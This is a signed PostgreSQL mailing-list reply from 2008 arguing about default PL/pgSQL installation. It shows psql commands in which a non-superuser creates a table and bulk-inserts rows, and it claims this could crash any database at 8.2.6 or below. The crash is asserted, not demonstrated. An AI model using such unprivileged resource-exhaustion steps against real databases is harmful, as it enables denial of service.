-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 21 Feb 2008 17:34:06 -0000
"Greg Sabino Mullane" <greg@turnstep.com> wrote:
> There are so many simple ways to "do bad things" /without/ plpgsql, I
> just don't see how the theoretical harm in it being used as an attack
> vector even comes close to the benefits of having it installed by
> default.
Since we are asking for something more than theoretical harm, here is
some practical harm:
postgres=> select usename,usecreatedb,usesuper,usecatupd from pg_user; usename | usecreatedb | usesuper | usecatupd
- -----------+-------------+----------+-----------ledgersmb | t | f | ffoo | f | f
| fpostgres | t | t | t
(3 rows)
Notice that user foo is not a super user. Now I log into
PostgreSQL and connect to the postgres database (the super users
database) as the non privileged user "foo". The user "foo" in theory
has *zero* rights here accept that he can connect.
psql -U foo postgres
Welcome to psql 8.2.6, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms \h for help with SQL commands \? for help with psql commands \g
orterminate with semicolon to execute query \q to quit
postgres=> create table watchmedie (a text);
CREATE TABLE
postgres=> insert into watchmedie values ( generate_series(1,10000))
postgres->
postgres=> insert into watchmedie values ( generate_series(1,10000));
INSERT 0 10000
postgres=>
In one fell swoop I could crash *any* postgresql database running 8.2.6
or below (I haven't tested this on 8.3).
Sincerely,
Joshua D. Drake
- --
The PostgreSQL Company since 1997: http://www.commandprompt.com/
PostgreSQL Community Conference: http://www.postgresqlconference.org/
Donate to the PostgreSQL Project: http://www.postgresql.org/about/donate
PostgreSQL SPI Liaison | SPI Director | PostgreSQL political pundit
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHvbyzATb/zqfZUUQRAgjwAJ0XKBlOPRgwjW2eFQELXkoWXlZ9SgCcCz0h
CD53HCmUZY/Nu/KpgYqwjEA=
=E7gn
-----END PGP SIGNATURE-----
